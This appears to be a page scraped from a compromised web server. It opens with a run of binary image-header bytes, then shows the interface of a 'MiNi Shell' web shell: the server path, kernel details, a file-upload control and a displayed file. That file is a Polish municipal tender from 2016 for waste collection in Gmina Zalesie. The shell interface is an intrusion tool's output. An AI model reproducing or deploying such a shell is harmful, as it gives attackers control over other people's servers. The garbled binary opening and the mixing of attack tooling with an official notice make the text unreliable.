JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161130/354903-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zalesie.biuletyn.net/' target='_blank'>http://www.zalesie.biuletyn.net/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 354903 - 2016
              z dnia 2016-11-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Zalesie: ODBIERANIE, TRANSPORT I ZAGOSPODAROWNIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH I W CZĘŚCI ZAMIESZKAŁYCH Z TERENU GMINY ZALESIE<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Zalesie, krajowy numer identyfikacyjny
              55147300000, ul.
              ul. Warszawska 
              34,
              21512  
              Zalesie, woj.
              lubelskie, państwo
              Polska, tel.
              833 757 586, e-mail
              marianw@lubelskie.pl, faks
              833 757 586.
              <br />
              Adres strony internetowej (URL): www.zalesie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />http://www.zalesie.biuletyn.net/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br /><br />
                Adres:
                <br />Urząd Gminy Zalesie, Warszawska 34, 21-512 Zalesie </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>ODBIERANIE, TRANSPORT I ZAGOSPODAROWNIE ODPADÓW KOMUNALNYCH OD WŁAŚCICIELI NIERUCHOMOŚCI ZAMIESZKAŁYCH I W CZĘŚCI ZAMIESZKAŁYCH Z TERENU GMINY ZALESIE<br /><b>Numer referencyjny: </b>GK.7031.1.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest:

1.1.	Odbiór odpadów komunalnych od właścicieli nieruchomości zamiesz-kałych i w części zamieszkałych z terenu gminy Zalesie  z wyłą-czeniem odpadów związanych z prowadzeniem działalności gospo-darczej oraz z koszy przy przystankach komunikacyjnych wg. za-łącznika Nr 9  .                                                                                                                             Obowiązywać będzie system mieszany workowo - pojemnikowy.
1.2 Zapewnienie mieszkańcom gminy Zalesie worków na odpady komunalne na warunkach opisanych w niniejszej   specyfikacji. Obowiązek wyposażenia posesji w pojemniki należy do ich właścicieli.
 1.3     Wyposażenie w niezbędny sprzęt i urządzenia ( wynikające z   przepisów ), prowadzenie, transport i zagospodarowanie przyjętych odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych w Zalesiu (PSZOK) i formach akcyjnych 
( przykładowo sprzątanie świata). Miejscem PSZOK jest oczyszczalnia ścieków w Zalesiu.
1. 4  Odbiór i transport odpadów komunalnych zmieszanych,   odpadów zmieszanych frakcja mokra  i odpadów zmieszanych frakcja sucha do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych  w Białej Podlaskiej ul. Ekologiczna 1  a w przypadku jej awarii do instalacji wska-zanej jako zastępcza, tj. sortowni odpadów zmieszanych, której właścicie-lem jest Międzygminny Związek Komunalny w Międzyrzecu Podlaskim  administrator - Ekolider Jarosław Wyglądała - z którą zawrze umowę, zgodnie z obowiązującymi przepisami. 
                                       Zawartą umowę Wykonawca przedłoży Zamawiającemu przed      
                                       podpisaniem umowy. 
Odpady selektywnie zebrane(w tym w PSZOK) Przedsiębiorca    może zagospodarować we własnym zakresie lub      
                                       przekazywać innemu uprawnionemu podmiotowi niż wskazany 
                                       powyżej ,celem recyklingu, przygotowania do ponownego 
                                       użycia lub odzysku innymi metodami.  

Będący w zakresie zamówienia odbiór i transport oraz zagospodarowanie zebranych odpadów poprzez przekazanie do instalacji przetwarzania odpadów wskazanych w opisie zamówienia z nieruchomości zamieszkałych i w części zamieszkałych położonych na terenie Gminy Zalesie powinien odbywać się w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t. j. Dz. U. z 2016 r. poz. 250 z późn. zm.) oraz zgodnie z obowiązującym w czasie trwania umowy Regulaminem utrzymania czystości i porządku na terenie Gminy Zalesie. 

Wspólny Słownik Zamówień Publicznych :
90513100-7 Usługi wywozu odpadów pochodzących z gospodarstw domowych.
90533000-2 Usługi zagospodarowania odpadów
90512000-9 Usługi transportu
90514000-3 Usługi recyklingu odpadów 
90500000-2 Usługi związane z odpadami.
34 92 84 80  6 Pojemniki i kosze na odpady i śmieci 





 

1.1 Usługa odbierania odpadów komunalnych od właścicieli nieruchomości zamieszkałych i w części zamieszkałych na terenie Gminy Zalesie , obejmuje:
1)	odbieranie odpadów komunalnych niesegregowanych ( zgodnie z obowiązującym w cza-sie trwania umowy Regulaminem utrzymania czystości    i porządku na terenie Gminy Zalesie).     
2)	odbieranie segregowanych zmieszanych odpadów komunalnych ( frakcja sucha  i frakcja mokra ) - zgodnie z obowiązującym w czasie trwania umowy Regulaminem utrzymania czystości i porządku na terenie Gminy).   
3)	odbieranie odpadów komunalnych  selektywnie zbieranych:
1.	papieru  i tektury
2.	tworzyw sztucznych i opakowań wielko materiałowych, 
3.	szkła opakowaniowego,
4.	metalu, 
5.	przeterminowanych leków i chemikaliów,
6.	mebli i odpadów wielkogabarytowych,
7.	zużytych baterii,
8.	zużytego sprzętu elektrycznego i elektronicznego,
9.	zużytych opon,
10.	odpadów budowlanych i rozbiórkowych,
11.	odpadów  ulegających biodegradacji.
12.	popiołu,
 

1.2 Zapewnienie mieszkańcom Gminy Zalesie worków na odpady komunalne na warunkach opisanych w niniejszej specyfikacji.
1)	Obowiązkiem Wykonawcy jest dostarczenie worków do gromadzenia odpadów zebranych  w sposób selektywny, pierwszy raz 12 szt. ( po 3 na każdy rodzaj )  najpóźniej do 3 stycznia 2017  r. , a następne każdorazowo przy kolejnym  odbiorze w takiej samej ilości i rodzaju ja-kie zostały odebrane.
Charakterystyka worków do selektywnej zbiórki odpadów na terenie zabudowy jed-norodzinnej i wielorodzinnej:
     a) worki z folii  o grubości zapewniającej odpowiednią wytrzymałość i szczelność o pojemności 120 l w kolorze:
                      b) niebieskim na papier i tekturę, 
c)	żółtym na tworzywa sztuczne,
d)	białym na opakowania szklane ,
e)	zielonym na popiół i odpady biodegradowalne.
2)	Koszt wyposażenia nieruchomości zabudowanych w worki oraz PSZOK w Zalesiu (w pojem-niki i worki do gromadzenia odpadów, prowadzenie, załadunek i zagospodarowanie odpadów z PSZOK ) ponosi Wykonawca ujmując je w oferowanej cenie. 
3)	Liczba zamieszkałych nieruchomości z których będą odbierane odpady komunalne wynosi 1.212 z czego: 1201 w zabudowie jednorodzinnej oraz 11  w zabudowie wie-lorodzinnej ( zamieszkałej przez 57 rodzin Kijowiec PGR). Zamawiający zastrzega sobie prawo zmiany ilości nieruchomości, z których będą odbierane odpady komu-nalne - będą to sytuacje sporadyczne. Szacuje się, że z pośród 1201 nieruchomości w zabudowie jednorodzinnej i wielorodzinnej około 92% nieruchomości będzie se-gregować odpady. Ostateczny wykaz (liczbę)  nieruchomości do których należy do-starczyć worki zostanie dostarczony Wykonawcy przez Zamawiającego najpóźniej do dnia 20.12.2016 r. 
4)	Wg posiadanych informacji z 10 m-cy 2016 r. na terenie gminy Zalesie właściciele nieruchomości zamieszkałych i w części zamieszkałych wyprodukowali łącznie 446,0 Mg odpadów komunalnych z tego:
	  66,0 Mg odpadów zmieszanych ( niesegregowane ) 
	209,0 Mg odpadów zmieszanych frakcja mokra i frakcja sucha,    171,0  Mg zebranych selektywnie w tym w PSZOK  33,.0 Mg, 
 (wszystkie nieruchomości zamieszkałe i w części zamieszkałe objęte będą zorganizowanym systemem zbiórki odpadów komunalnych zarówno zmieszanych jak i segregowanych ) .

Szacuje się, że w okresie 12 miesięcy trwania zamówienia ( 01.01.2017  31.12.1017 r.) wyprodukowanych będzie około 520,0 Mg odpadów komunalnych w tym:
	  70,00 Mg odpadów  niesegregowanych,
	250,00  Mg odpadów komunalnych zmieszanych   (frakcja sucha i mokra) 
	200,00 Mg odpadów zebranych selektywnie w tym: 47,0 Mg z PSZOK w Zalesiu.
Ilość odpadów podana powyżej jest jak zaznaczono szacunkowa i wynika ze sprawozdań. Wielkości te podane są w celu sporządzenia oferty. 

5)	Odbieranie odpadów niesegregowanych i odpadów selektywnie zebranych, zgromadzonych przez właścicieli nieruchomości w pojemnikach i workach, następować będzie według usta-lonego harmonogramu sporządzonego przez Wykonawcę i zatwierdzonego przez Zamawia-jącego, z częstotliwością określoną w Regulaminie utrzymania czystości i porządku w gminie Zalesie:
a.	niesegregowane odpady komunalne oraz frakcja mokra i sucha  - 1 raz w miesiącu,
b.	odpady selektywnie zebrane (raz na kwartał) :
- papier i tektura,
- tworzywa sztuczne i wielomateriałowe,
- szkło opakowaniowe,
c.	popiół w okresie październik - marzec raz na miesiąc w pozostałym okresie raz na kwartał,
d.	ulegające biodegradacji  raz na dwa miesiące.
e.	odpady z PSZOK  w Zalesiu: ( zużyty i zbędny sprzęt elektryczny 
i elektroniczny, baterie, chemikalia ( farby itp. oraz opakowania po nich, zużyte opony , meble i odpady wielkogabarytowe , odpady budowlane i rozbiórkowe , odpady ule-gające biodegradacji , pozostałe : żarówki itp., metal  )  odbierane będą:
- 1 raz w miesiącu w okresie styczeń - grudzień,( w drugą środę miesiąca).
Zamawiający z Wykonawcą opracuje przed podpisaniem umowy harmonogram odbioru, który stanowić będzie załącznik do umowy.

6)	Forma i metoda gromadzenia i przekazywania odpadów :  (worki  dostarcza Wykonawca natomiast pojemniki  zakupuje właściciel nieruchomości na własny koszt):
a.	Zabudowa jednorodzinna: 
Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany (pojemniki i worki):
w pojemnikach 110l lub 240l przystosowanych do załadunku specjalistycznym sprzętem  odpady zmieszane będą gromadzone wg zasady: 
	jeden pojemnik o pojemności 110l lub 120l gdy nieruchomość zamieszkuje do trzech osób , jeden pojemnik o pojemności 240 l gdy nieruchomość za-mieszkuje do cztery lub pięć osób,  
	pojemniki o pojemności 240l i 120l gdy nieruchomość zamieszkuje 6 i więcej osób , 
w workach o pojemności od 60l do 120l z folii gromadzone będą odpady selektywnie zebrane wg zasady: jeden worek na kwartał na każdą nieruchomość na odpowiednią frakcję odpadów odbieranych w sposób selektywny tj. papier, szkło opakowaniowe, odpady zielone i tworzywa sztuczne, które zapewni Wykonawca dla każdego rodzaju odpadów.
Niesegregowane (zmieszane) odpady komunalne gromadzone będą w pojemnikach              110l lub 240l oraz w pojemnikach o pojemności 1.100l (aktualnie 1 nieruchomość)                                                      i o pojemności 7.000l ( aktualnie 1 nieruchomość ) które  zapewniają  Właściciele nieruchomości i ustawią je w miejscach łatwo dostępnych .
b.	Zabudowa wielorodzinna  Kijowiec PGR	
W zabudowie wielorodzinnej obowiązywał będzie system segregacji 
i obioru odpadów komunalnych identyczny jak przy zabudowie jednorodzinnej.
7)	Odbiór odpadów selektywnych od mieszkańców gminy, którzy zadeklarowali selektywną zbiórkę odpadów prowadzony będzie według następujących zasad:
a.	Odpady selektywne i odpady zmieszane będą odbierane w różne dni, nie dopuszcza-jąc do zmieszania poszczególnych rodzajów odpadów.                                                     Poszczególne grupy odpadów selektywnie zbieranych winne być odebrane jednego dnia.
b.	Wykonawca sprawdzi losowo lecz nie mniej niż 5 na 100 nieruchomości, worki z od-padami selektywnie zbieranymi  pod kątem rzetelności segregacji odpadów przez mieszkańców. W przypadku stwierdzenia niewłaściwej segregacji Wykonawca  przyjmuje te odpady, jako zmieszane.                                                                                                                                       Przed zakwalifikowaniem odpadów selektywnych do zmieszanych w wypadku nie-dopełnienia przez właściciela nieruchomości obowiązku w zakresie selektywnego zbierania odpadów komunalnych, Wykonawca sporządza na tę okoliczność doku-mentację (np. oświadczenie lub dokumentację fotograficzną) i przekazuje Zamawia-jącemu. Uchylanie się od obowiązku zgłaszania Zamawiającemu informacji dotyczą-cej zaistniałych nieprawidłowości w sposobie segregacji odpadów będzie stanowić na-ruszenie postanowień umowy.
c.	Wykonawca zobowiązany jest do odbioru wszystkich odpadów zmieszanych oraz se-lektywnie zebranych. 
8)	Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemników wynikłe z winy Wykonawcy, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wy-konawcy.

1.3 W  Punkcie Selektywnego Zbierania Odpadów Komunalnych w Zalesiu (PSZOK) będą przyjmowane nieodpłatnie następujące grupy odpadów, dostarczonych do punktu własnym kosztem i staraniem właścicieli nieruchomości: 
	metal,
	chemikalia ( farby, lakiery, impregnaty, rozpuszczalniki itp.) oraz opakowania po nich
	meble i odpady wielkogabarytowe (  bez względu na ilość materiałów, z których są zbudo-wane, a których gabaryty nie pozwalają na umieszczenie ich w pojemnikach lub workach przeznaczonych do odbioru frakcji zmieszanej lub frakcji z selektywnej zbiórki ), 
	zużyte baterie,
	zużyty sprzęt elektryczny i elektroniczny,
	zużyte opony,
	odpady budowlane i rozbiórkowe (z remontów i rozbiórek nie wymagających pozwoleń  na budowę i rozbiórkę, z wyjątkiem materiałów zawierających azbest),
	odpady ulegające biodegradacji,
	pozostałe nie wymienione (żarówki itp.).
Wszystkie powyższe rodzaje odpadów przyjmowane są w ilościach faktycznie powstałych w gospodarstwach domowych, nie wskazujących na ich przemysłowy, usługowy oraz produkcyjny charakter. 
PSZOK będzie funkcjonował przez cały okres obowiązywania umowy,
- 1 raz w miesiącu w okresie styczeń - grudzień, w każdą drugą środę miesiąca                              od 1500 do 1700 . 
Wykonawca dbać będzie o czystość i porządek na terenie PSZOK w Zalesiu  oraz na  terenie bezpośrednio przyległym, a zebrane odpady winne być na bieżąco przekazywane do Regionalnej Instalacji Przetworzenia Odpadów Komunalnych w Białej Podlaskiej, uprawnionemu przedsiębiorcy do recyklingu lub zagospodarowane we własnym zakresie. 
Wykonawca przekazywać będzie informację miesięczną do 5-tego dnia następnego miesiąca z PSZOK zawierającą: wykaz posesji, z których dostarczono odpady, ich rodzaj i ilość oraz sposób zagospodarowania.
Przeterminowane i zbędne leki gromadzone będą w specjalnych pojemnikach w Aptece funkcjonującej w Zalesiu po czym odbierane będą przez Wykonawcę w terminach uzgodnionych z właścicielem Apteki.
<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90513100-7,
                90512000-9,
                90514000-3,
                90533000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1) wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Zalesie;
2) oraz decyzji - zezwolenia na transport odpadów obejmującego odpady będące przedmiotem zamówienia.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Przedstawienie polisy ubezpieczeniowej na kwotę ubezpieczenia nie mniejszą niż 100 000 zł w zakresie prowadzonej działalności.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Opis sposobu dokonywania oceny spełniania tego warunku:
- Wykonawca musi wykazać dysponowanie co najmniej dwoma specjalistycznymi pojazdami do odbioru odpadów zmieszanych i co najmniej dwoma do zbieranych selektywnie oraz samochodu bez funkcji kompaktującej. Wszystkie samochody winne być wyposażone w system GPS umożliwiający Zamawiającemu monitorowanie trasy odbioru i transportu odpadów do zakładu zagospodarowania odpadów.
- Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 3 usług w zakresie odbioru, transportu i zagospodarowania odpadów w ilości nie mniejszej niż 400 ton w skali roku  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie.

2. Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie 
od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów 
do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
